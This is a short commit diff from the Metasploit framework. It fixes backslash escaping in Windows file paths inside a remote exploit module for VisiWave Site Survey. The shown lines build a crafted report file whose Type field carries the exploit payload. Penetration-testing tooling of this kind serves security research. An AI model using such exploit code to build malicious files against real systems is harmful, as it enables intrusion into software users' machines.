escape slashes, thanks aushack
git-svn-id: file:///home/svn/framework3/trunk@12738 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
3eabf41a67
commit
ef7a7adc1e
|
@ -118,8 +118,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
vwr_data << "Item: Global Properties\r\n"
|
||||
vwr_data << "Checked: 1\r\n"
|
||||
vwr_data << "Type: #{sploit}\r\n"
|
||||
vwr_data << "SurveyFile: C:\Program Files\VisiWave Site Survey\Samples\SampleData.vws\r\n"
|
||||
vwr_data << "FloorPlanImageReport: C:\WINDOWS\Web\bullet.gif\r\n"
|
||||
vwr_data << "SurveyFile: C:\\Program Files\\VisiWave Site Survey\\Samples\\SampleData.vws\r\n"
|
||||
vwr_data << "FloorPlanImageReport: C:\\WINDOWS\\Web\\bullet.gif\r\n"
|
||||
vwr_data << "DefaultOrientation: 0\r\n"
|
||||
vwr_data << "Header:\r\n"
|
||||
vwr_data << "Footer:\r\n"
|
||||
|
|
Loading…
Reference in New Issue